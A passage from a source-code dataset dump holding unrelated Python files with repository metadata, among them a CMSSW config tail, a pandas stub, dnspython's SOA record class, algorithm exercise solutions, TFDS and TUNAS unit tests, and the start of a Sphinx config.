process.NANOAODSIMoutput_step = cms.EndPath(process.NANOAODSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODSIMoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeMC
#call to customisation function nanoAOD_customizeMC imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeMC(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
| [
"[email protected]"
]
| |
fc521136d37bde83bf4b77d4966c06e6653d750b | 3f6c16ea158a8fb4318b8f069156f1c8d5cff576 | /.PyCharm2019.1/system/python_stubs/-1317042838/pandas/_libs/ops.py | a84d13f1d42b972f9af8b614b27048d38673cdb9 | []
| no_license | sarthak-patidar/dotfiles | 08494170d2c0fedc0bbe719cc7c60263ce6fd095 | b62cd46f3491fd3f50c704f0255730af682d1f80 | refs/heads/master | 2020-06-28T23:42:17.236273 | 2019-10-01T13:56:27 | 2019-10-01T13:56:27 | 200,369,900 | 0 | 0 | null | 2019-08-03T12:56:33 | 2019-08-03T11:53:29 | Shell | UTF-8 | Python | false | false | 2,829 | py | # encoding: utf-8
# module pandas._libs.ops
# from /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so
# by generator 1.147
# no doc
# imports
import builtins as __builtins__ # <module 'builtins' (built-in)>
import operator as operator # /usr/lib/python3.6/operator.py
import numpy as np # /var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/numpy/__init__.py
# functions
def maybe_convert_bool(*args, **kwargs): # real signature unknown
pass
def scalar_binop(*args, **kwargs): # real signature unknown
"""
Apply the given binary operator `op` between each element of the array
`values` and the scalar `val`.
Parameters
----------
values : ndarray[object]
val : object
op : binary operator
Returns
-------
result : ndarray[object]
"""
pass
def scalar_compare(*args, **kwargs): # real signature unknown
"""
Compare each element of `values` array with the scalar `val`, with
the comparison operation described by `op`.
Parameters
----------
values : ndarray[object]
val : object
op : {operator.eq, operator.ne,
operator.le, operator.lt,
operator.ge, operator.gt}
Returns
-------
result : ndarray[bool]
"""
pass
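# Illustrative call (assumed from the docstring above; the compiled function's
# real signature is unknown):
#
#     import operator
#     values = np.array([1, 2, 3], dtype=object)
#     scalar_compare(values, 2, operator.lt)   # -> array([ True, False, False])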
def vec_binop(*args, **kwargs): # real signature unknown
"""
Apply the given binary operator `op` pointwise to the elements of
arrays `left` and `right`.
Parameters
----------
left : ndarray[object]
right : ndarray[object]
op : binary operator
Returns
-------
result : ndarray[object]
"""
pass
def vec_compare(*args, **kwargs): # real signature unknown
"""
Compare the elements of `left` with the elements of `right` pointwise,
with the comparison operation described by `op`.
Parameters
----------
left : ndarray[object]
right : ndarray[object]
op : {operator.eq, operator.ne,
operator.le, operator.lt,
operator.ge, operator.gt}
Returns
-------
result : ndarray[bool]
"""
pass
def __pyx_unpickle_Enum(*args, **kwargs): # real signature unknown
pass
# no classes
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>'
__spec__ = None # (!) real value is "ModuleSpec(name='pandas._libs.ops', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7f43e7e6f8d0>, origin='/var/www/newsbytes/CPP/venv/lib/python3.6/site-packages/pandas/_libs/ops.cpython-36m-x86_64-linux-gnu.so')"
__test__ = {}
| [
"[email protected]"
]
| |
ce3333447ac28a3d89c0757d6ada515e638e5bd2 | 8410bb5a2e8849bb3a554b95ddc713d88f3440c4 | /aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/SOA.py | aec81cad8ac916e9bc71052ecbc4983cdabbd126 | [
"MIT"
]
| permissive | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | ae99b6c1efb30e8fab5b76e3d8c821823a4cd852 | b9838b4e038b42ad1813a296379cbbc40cab6286 | refs/heads/master | 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 | MIT | 2021-06-02T00:57:45 | 2019-11-06T09:54:09 | Python | UTF-8 | Python | false | false | 4,597 | py | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import struct
import dns.exception
import dns.rdata
import dns.name
class SOA(dns.rdata.Rdata):
"""SOA record
@ivar mname: the SOA MNAME (master name) field
@type mname: dns.name.Name object
@ivar rname: the SOA RNAME (responsible name) field
@type rname: dns.name.Name object
@ivar serial: The zone's serial number
@type serial: int
@ivar refresh: The zone's refresh value (in seconds)
@type refresh: int
@ivar retry: The zone's retry value (in seconds)
@type retry: int
@ivar expire: The zone's expiration value (in seconds)
@type expire: int
@ivar minimum: The zone's negative caching time (in seconds, called
"minimum" for historical reasons)
@type minimum: int
@see: RFC 1035"""
__slots__ = ['mname', 'rname', 'serial', 'refresh', 'retry', 'expire',
'minimum']
def __init__(self, rdclass, rdtype, mname, rname, serial, refresh, retry,
expire, minimum):
super(SOA, self).__init__(rdclass, rdtype)
self.mname = mname
self.rname = rname
self.serial = serial
self.refresh = refresh
self.retry = retry
self.expire = expire
self.minimum = minimum
def to_text(self, origin=None, relativize=True, **kw):
mname = self.mname.choose_relativity(origin, relativize)
rname = self.rname.choose_relativity(origin, relativize)
return '%s %s %d %d %d %d %d' % (
mname, rname, self.serial, self.refresh, self.retry,
self.expire, self.minimum)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
mname = tok.get_name()
rname = tok.get_name()
mname = mname.choose_relativity(origin, relativize)
rname = rname.choose_relativity(origin, relativize)
serial = tok.get_uint32()
refresh = tok.get_ttl()
retry = tok.get_ttl()
expire = tok.get_ttl()
minimum = tok.get_ttl()
tok.get_eol()
return cls(rdclass, rdtype, mname, rname, serial, refresh, retry,
expire, minimum)
def to_wire(self, file, compress=None, origin=None):
self.mname.to_wire(file, compress, origin)
self.rname.to_wire(file, compress, origin)
five_ints = struct.pack('!IIIII', self.serial, self.refresh,
self.retry, self.expire, self.minimum)
file.write(five_ints)
def to_digestable(self, origin=None):
return self.mname.to_digestable(origin) + \
self.rname.to_digestable(origin) + \
struct.pack('!IIIII', self.serial, self.refresh,
self.retry, self.expire, self.minimum)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
(mname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
current += cused
rdlen -= cused
(rname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
current += cused
rdlen -= cused
if rdlen != 20:
raise dns.exception.FormError
five_ints = struct.unpack('!IIIII',
wire[current: current + rdlen])
if origin is not None:
mname = mname.relativize(origin)
rname = rname.relativize(origin)
return cls(rdclass, rdtype, mname, rname,
five_ints[0], five_ints[1], five_ints[2], five_ints[3],
five_ints[4])
def choose_relativity(self, origin=None, relativize=True):
self.mname = self.mname.choose_relativity(origin, relativize)
self.rname = self.rname.choose_relativity(origin, relativize)
| [
"[email protected]"
]
| |
d8adcfa0328f753994b60200ace6ca4d145e0f23 | 3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed | /Algorithms/LeetCode/L0079exist.py | c6486ef5bca5b6781c64631e90da4eed40b18976 | []
| no_license | arunachalamev/PythonProgramming | c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c | ea188aaa1b72511aeb769a2829055d0aae55e73e | refs/heads/master | 2021-06-04T03:50:37.976293 | 2020-11-12T19:52:28 | 2020-11-12T19:52:28 | 97,364,002 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 702 | py |
def exist(board, word):
m,n = len(board), len(board[0])
def search(i,j,word):
nonlocal m,n
if len(word) == 0:
return True
if i<0 or i==m or j <0 or j==n or board[i][j] !=word[0]:
return False
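        # Mark the cell so it cannot be reused while exploring this path.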
board[i][j] = '#'
for di,dj in [(0,1),(0,-1),(1,0),(-1,0)]:
if search (i+di, j+dj , word[1:]):
return True
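        # Backtrack: restore the original letter for other search paths.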
board[i][j] = word[0]
return False
for i,row in enumerate(board):
for j,_ in enumerate(row):
if search(i,j,word):
return True
return False
print (exist([
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
], 'ABCCEDX')) | [
"[email protected]"
]
| |
0bf7dd56ef9f8d3dc81a166b9e292152ff8911ac | 2aba3c043ce4ef934adce0f65bd589268ec443c5 | /AOJ/courses/ITP1/3_C.py | 221621fc02dd16be341b7f831191bed733e02394 | []
| no_license | kambehmw/algorithm_python | 4f66593b77039d90515d1fcbecacdab8c811b92f | 17222399dcc92fd8f908e5774a9883e2e89c486e | refs/heads/master | 2020-06-02T12:44:11.322356 | 2020-05-18T13:22:05 | 2020-05-18T13:22:05 | 191,157,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | while True:
x, y = map(int, input().split())
if x == 0 and y == 0:
exit()
else:
if x < y:
print(x, y)
else:
print(y, x) | [
"[email protected]"
]
| |
8af8b1154126237b12e676c20db0981a5f9e3d8e | 8a14a7724d00f1eb7791e53f8446e99ecc975605 | /scripts/extract_features.py | 95649f83351e38ae3501cff705bf80339edd1315 | [
"Apache-2.0"
]
| permissive | aschn/picolo | 3fa7b26d079fc9687de9c3e1e34cae774bcf8416 | 1f8f50e0709fdaef31bc38045ef9fd0c46aae2b5 | refs/heads/master | 2020-04-30T01:37:36.587287 | 2013-07-19T00:32:05 | 2013-07-19T00:32:05 | 9,307,233 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author Anna Schneider
@version 0.1
@brief Typical script using picolo to extract features from point particles
"""
import picolo
from shapes import shape_factory_from_values
import argparse
import os.path as path
import time
import csv
# start timer
start = time.time()
# parse command-line arguments
brief = 'Typical script using picolo to extract features from point particles.'
parser = argparse.ArgumentParser(description=brief)
parser.add_argument('filename', type=str, help='path to xy coord file')
parser.add_argument('shape', type=str, help='type of features to extract',
choices=['UnitCell', 'Fourier', 'Zernike'])
parser.add_argument('dist', type=float, help='distance cutoff to neighbors')
parser.add_argument('--train', action='store_true',
help='include flag to only get features for prespecified training rows')
args = parser.parse_args()
# set up file paths
rootname, ext = path.splitext(args.filename)
dirname = path.dirname(args.filename)
# set up matcher
matcher = picolo.Matcher(args.filename, delim=' ', name=rootname,
trainingcol=2)
# create and add default shape of correct type
shape = shape_factory_from_values(args.shape,
optdata={'neighbor_dist': args.dist,
'max_dist': args.dist})
matcher.shapes.add('test', shape)
# get ndarray of features and particle ids by comparing to 'test' shape
features = matcher.feature_matrix('test')
# open csv writer
outfile = '%s_%s_features.dat' % (rootname, args.shape)
writer = csv.writer(open(outfile, 'w'), delimiter=' ')
# write header
writer.writerow(['id'] + shape.get_components())
# loop over particle ids
if args.train:
inds = matcher.training_ids
else:
inds = range(matcher.config.N)
for ip in inds:
# only write features for particles with valid shapes
if matcher.get_features('test', ip).get('is_valid'):
# write row of features
writer.writerow([ip] + ['%0.4f' % x for x in features[ip]])
# end timer
end = time.time()
print 'Done with %s ... took %d seconds.' % (rootname, end-start)
| [
"[email protected]"
]
| |
1eadf13b44ed3ecced195ac1f6974c5866be1f8b | 37efda4646f478b66674e384e1bc139e7874d972 | /practice/RaodtoMillionaire.py | 7677b54444573abaec9ffa4c8c2fa22f69a24b2b | []
| no_license | siberian122/kyoupuro | 02c1c40f7c09ff0c07a1d50b727f860ad269d8b1 | 8bf5e5b354d82f44f54c80f1fc014c9519de3ca4 | refs/heads/master | 2023-04-04T02:45:29.445107 | 2021-04-20T07:37:47 | 2021-04-20T07:37:47 | 299,248,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | n = int(input())
a = list(map(int, input().split()))
b = []
for i in range(n-1):
num = a[i]-a[i+1]
b.append(num)
now = 1000
stock = 0
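# Greedy strategy: sell everything just before the price drops (b[i] > 0) and
# buy as much as possible just before it rises (b[i] < 0); any remaining stock
# is sold at the final day's price below.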
for i in range(n-1):
    if b[i] > 0:  # sell
now += stock*a[i]
stock = 0
    elif now > 0 and b[i] < 0:  # buy
stock += now//a[i]
now = now % a[i]
#print(now, stock)
now += a[-1]*stock
print(now)
| [
"[email protected]"
]
| |
c96667e76a4d649fc180fffd2ee6abb688e027cb | d4fdbd68c42d6b9babe347cb3b65535e4d782172 | /tensorflow_datasets/image/voc_test.py | 1bbb9140e84808b1f66441b6ba103c2e8483ec03 | [
"Apache-2.0"
]
| permissive | thanhkaist/datasets | 2809260c5e95e96d136059bea042d1ed969a6fcf | 02da35c558ec8ea704e744a2008c5cecb2e7a0a1 | refs/heads/master | 2020-06-04T16:13:14.603449 | 2019-06-14T22:01:33 | 2019-06-14T22:02:54 | 192,097,735 | 2 | 0 | Apache-2.0 | 2019-06-15T16:02:18 | 2019-06-15T16:02:18 | null | UTF-8 | Python | false | false | 1,060 | py | # coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for PASCAL VOC image data loading."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_datasets import testing
from tensorflow_datasets.image import voc
class Voc2007Test(testing.DatasetBuilderTestCase):
DATASET_CLASS = voc.Voc2007
SPLITS = {
'train': 1,
'validation': 2,
'test': 3,
}
if __name__ == '__main__':
testing.test_main()
| [
"[email protected]"
]
| |
2fc48de98fbc2450366953e3be1285d20c36401a | ac8ffabf4d7339c5466e53dafc3f7e87697f08eb | /python_solutions/1080.insufficient-nodes-in-root-to-leaf-paths.py | 4ba1ede95bb6688d9b4c3e860ddfe8e1d3dd646d | []
| no_license | h4hany/leetcode | 4cbf23ea7c5b5ecfd26aef61bfc109741f881591 | 9e4f6f1a2830bd9aab1bba374c98f0464825d435 | refs/heads/master | 2023-01-09T17:39:06.212421 | 2020-11-12T07:26:39 | 2020-11-12T07:26:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,173 | py | from collections import Counter, defaultdict, OrderedDict, deque
from bisect import bisect_left, bisect_right
from functools import reduce, lru_cache
from typing import List
import itertools
import math
import heapq
import string
true = True
false = False
MIN, MAX, MOD = -0x3f3f3f3f, 0x3f3f3f3f, 1000000007
#
# @lc app=leetcode id=1080 lang=python3
#
# [1080] Insufficient Nodes in Root to Leaf Paths
#
# https://leetcode.com/problems/insufficient-nodes-in-root-to-leaf-paths/description/
#
# algorithms
# Medium (49.43%)
# Total Accepted: 14.4K
# Total Submissions: 29K
# Testcase Example: '[1,2,3,4,-99,-99,7,8,9,-99,-99,12,13,-99,14]\n1'
#
# Given the root of a binary tree, consider all root to leaf paths: paths from
# the root to any leaf. (A leaf is a node with no children.)
#
# A node is insufficient if every such root to leaf path intersecting this node
# has sum strictly less than limit.
#
# Delete all insufficient nodes simultaneously, and return the root of the
# resulting binary tree.
#
#
#
# Example 1:
#
#
#
# Input: root = [1,2,3,4,-99,-99,7,8,9,-99,-99,12,13,-99,14], limit = 1
#
# Output: [1,2,3,4,null,null,7,8,9,null,14]
#
#
#
# Example 2:
#
#
#
# Input: root = [5,4,8,11,null,17,4,7,1,null,null,5,3], limit = 22
#
# Output: [5,4,8,11,null,17,4,7,null,null,null,5]
#
#
#
# Example 3:
#
#
#
# Input: root = [1,2,-3,-5,null,4,null], limit = -1
#
# Output: [1,null,-3,4]
#
#
#
#
# Note:
#
#
# The given tree will have between 1 and 5000 nodes.
# -10^5 <= node.val <= 10^5
# -10^9 <= limit <= 10^9
#
#
#
#
#
#
#
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def sufficientSubset(self, root: TreeNode, limit: int) -> TreeNode:
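        # Pass the remaining requirement (limit - node value) down the tree; a
        # leaf survives only if its value covers what is left, and an inner
        # node is removed once both pruned subtrees disappear.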
if not root: return None
if not root.left and not root.right:
return root if root.val >= limit else None
root.left = self.sufficientSubset(root.left, limit - root.val)
root.right = self.sufficientSubset(root.right, limit - root.val)
return None if not root.left and not root.right else root
| [
"[email protected]"
]
| |
75a63b080058ba26e1aa2ae9b422c95c519a403c | 3e93c3bbe35c24bf7f1a75c612ab300f37063621 | /C1/L1_18_mappingnameseq_namedtuple.py | f393d21fd2cf887c699056da4973e6a7725476db | []
| no_license | rengokantai/orpycok3ed | 5ac0195a48f02dcc5bbc720e812f637464215e8f | 50ce744265dc6af0d1a4724ea52348faeb47764d | refs/heads/master | 2021-01-10T05:05:53.477092 | 2016-03-12T20:04:45 | 2016-03-12T20:04:45 | 53,352,163 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | __author__ = 'Hernan Y.Ke'
from collections import namedtuple
# memorize this syntax
Me = namedtuple('Me',['first','last'])
me = Me(1,2)
print(me.first,me.last)
she=[Me(3,4),Me(5,6)]
# me = Me(first=1, last=2)  # keyword arguments also work
me = me._replace(first=3)
print(me.first)
# get namedtuple
def get_num(tuplearr):
res=0
for param in tuplearr:
        s = Me(*param) # unpack each tuple into a namedtuple; param holds all fields of one entry
res+=s.first+s.last
return res
print(get_num(she))
#replace all params
def replace_params(tupleparams):
return me._replace(**tupleparams) # two stars. kwargs
newparams={'first':7,'last':8}
print(replace_params(newparams)) | [
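# Further note: namedtuple also exposes the field names and a dict view, e.g.
# Me._fields == ('first', 'last') and me._asdict() returns the current values.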
"[email protected]"
]
| |
ca2e60ef61a63bcc4473f3bb4ca159430fb5c13a | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/intentions/PyAnnotateTypesIntentionTest/methodAfterConstructorCall.py | 0cdc87e27827504a3baf5a3c8d4524a6604e3e8c | [
"Apache-2.0"
]
| permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 133 | py | class MyClass:
def __init__(self):
pass
def method(self, x):
pass
x = MyClass()
foo = x.met<caret>hod(42)
| [
"[email protected]"
]
| |
daec12433149d0fa4a8fe97be29bea0af0818e98 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /tunas/schema_test.py | c27def77e798c010f8c380efefd021e51bc209c9 | [
"CC-BY-4.0",
"Apache-2.0"
]
| permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 8,923 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for schema."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import tensorflow.compat.v1 as tf
from tunas import schema
class SchemaTest(tf.test.TestCase):
def test_oneof_equality_simple(self):
not_one_of = collections.namedtuple(
'NotOneOf', ['choices', 'tag', 'mask'])
tensor1 = tf.constant([3.0])
tensor2 = tf.constant([4.0])
self.assertEqual(
schema.OneOf([1, 2], 'foo'),
schema.OneOf([1, 2], 'foo'))
self.assertEqual(
schema.OneOf([1, 2], 'foo', tensor1),
schema.OneOf([1, 2], 'foo', tensor1))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo'),
schema.OneOf([1], 'foo'))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo'),
schema.OneOf([1, 2], 'bar'))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo', tensor1),
schema.OneOf([1, 2], 'foo', None))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo', tensor1),
schema.OneOf([1, 2], 'foo', tensor2))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo', tensor1),
not_one_of([1, 2], 'foo', tensor1))
self.assertNotEqual(
schema.OneOf([1, 2], 'foo'),
{})
self.assertNotEqual(
{},
schema.OneOf([1, 2], 'foo'))
def test_oneof_equality_nested(self):
self.assertEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'))
self.assertNotEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([4], 'b')], 'c'))
self.assertNotEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
schema.OneOf([schema.OneOf([1, 5], 'a'), schema.OneOf([3], 'b')], 'c'))
self.assertNotEqual(
schema.OneOf([schema.OneOf([1, 2], 'a'), schema.OneOf([3], 'b')], 'c'),
'Goooooooooooooooooooooooooooooooooooooooooooooogle')
def test_oneof_repr(self):
self.assertEqual(
repr(schema.OneOf([1, 2], 'foo')),
'OneOf(choices=[1, 2], tag=\'foo\')')
self.assertStartsWith(
repr(schema.OneOf([1, 2], 'foo', tf.constant([3.0]))),
'OneOf(choices=[1, 2], tag=\'foo\', mask=')
def test_map_oenofs_with_tuple_paths_trivial(self):
structure = schema.OneOf([1, 2], 'tag')
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_tuple_paths(visit, structure),
schema.OneOf([10, 20], 'tag'))
self.assertEqual(all_paths, [()])
self.assertEqual(all_oneofs, [schema.OneOf([1, 2], 'tag')])
def test_map_oneofs_with_tuple_paths_simple(self):
structure = [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_tuple_paths(visit, structure), [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
])
self.assertEqual(all_paths, [
(0,),
(1,)
])
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
def test_map_oneofs_with_tuple_paths_containing_arrays_and_dicts(self):
structure = {
'foo': [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]}
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_tuple_paths(visit, structure), {
'foo': [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
]})
self.assertEqual(all_paths, [
('foo', 0),
('foo', 1),
])
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
def test_map_oneofs_with_tuple_paths_containing_nested_oneofs(self):
structure = {
'root': schema.OneOf([
schema.OneOf([
{'leaf': schema.OneOf([1, 10], 'level2')},
{'leaf': schema.OneOf([2, 20], 'level2')},
], 'level1'),
schema.OneOf([
{'leaf': schema.OneOf([3, 30], 'level2')},
{'leaf': schema.OneOf([4, 40], 'level2')},
{'leaf': schema.OneOf([5, 50], 'level2')},
], 'level1')
], 'level0')
}
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([oneof.choices[0]], oneof.tag)
self.assertEqual(
schema.map_oneofs_with_tuple_paths(visit, structure),
{
'root': schema.OneOf([
schema.OneOf([
{'leaf': schema.OneOf([1], 'level2')},
], 'level1'),
], 'level0')
})
self.assertEqual(all_paths, [
('root', 'choices', 0, 'choices', 0, 'leaf'),
('root', 'choices', 0, 'choices', 1, 'leaf'),
('root', 'choices', 0),
('root', 'choices', 1, 'choices', 0, 'leaf'),
('root', 'choices', 1, 'choices', 1, 'leaf'),
('root', 'choices', 1, 'choices', 2, 'leaf'),
('root', 'choices', 1),
('root',),
])
# A OneOf node's children should already be updated by the time we visit it.
self.assertEqual(all_oneofs, [
schema.OneOf([1, 10], 'level2'),
schema.OneOf([2, 20], 'level2'),
schema.OneOf(
[
{'leaf': schema.OneOf([1], 'level2')},
{'leaf': schema.OneOf([2], 'level2')},
], 'level1'),
schema.OneOf([3, 30], 'level2'),
schema.OneOf([4, 40], 'level2'),
schema.OneOf([5, 50], 'level2'),
schema.OneOf(
[
{'leaf': schema.OneOf([3], 'level2')},
{'leaf': schema.OneOf([4], 'level2')},
{'leaf': schema.OneOf([5], 'level2')},
], 'level1'),
schema.OneOf(
[
schema.OneOf([
{'leaf': schema.OneOf([1], 'level2')},
], 'level1'),
schema.OneOf([
{'leaf': schema.OneOf([3], 'level2')},
], 'level1')
], 'level0'),
])
def test_map_oneofs_with_paths(self):
structure = {
'foo': [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]}
all_paths = []
all_oneofs = []
def visit(path, oneof):
all_paths.append(path)
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs_with_paths(visit, structure), {
'foo': [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
]})
self.assertEqual(all_paths, [
'foo/0',
'foo/1',
])
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
def test_map_oneofs(self):
structure = {
'foo': [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
]}
all_oneofs = []
def visit(oneof):
all_oneofs.append(oneof)
return schema.OneOf([x*10 for x in oneof.choices], oneof.tag)
self.assertEqual(schema.map_oneofs(visit, structure), {
'foo': [
schema.OneOf([10, 20], 'tag1'),
schema.OneOf([30, 40, 50], 'tag2'),
]})
self.assertEqual(all_oneofs, [
schema.OneOf([1, 2], 'tag1'),
schema.OneOf([3, 4, 5], 'tag2'),
])
if __name__ == '__main__':
tf.disable_v2_behavior()
tf.test.main()
| [
"[email protected]"
]
| |
88a1fb94a80440856187d57d3df5d55a56f854f5 | 0dc8627205c1545b4a5d82d1b9e55bc64eedc0b8 | /transcripts/conf.py | 3f10dbffa1b2b69fda708f5fbb98846f344db5cd | []
| no_license | evildmp/DjangoConEuropeTranscripts | 508ee00c1c2bde803dd13aaac6171eb9fbcbb2db | d21e57780e1b4c497d8a700e5b99999bded9f303 | refs/heads/master | 2016-08-11T06:52:40.669453 | 2015-08-13T22:32:33 | 2015-08-13T22:32:33 | 36,973,906 | 12 | 9 | null | 2017-01-01T08:49:40 | 2015-06-06T09:01:29 | Python | UTF-8 | Python | false | false | 9,937 | py | # -*- coding: utf-8 -*-
#
# Speech-to-text reports from DjangoCon Europe 2015 build configuration file, created by
# sphinx-quickstart on Sat Jun 6 09:11:53 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
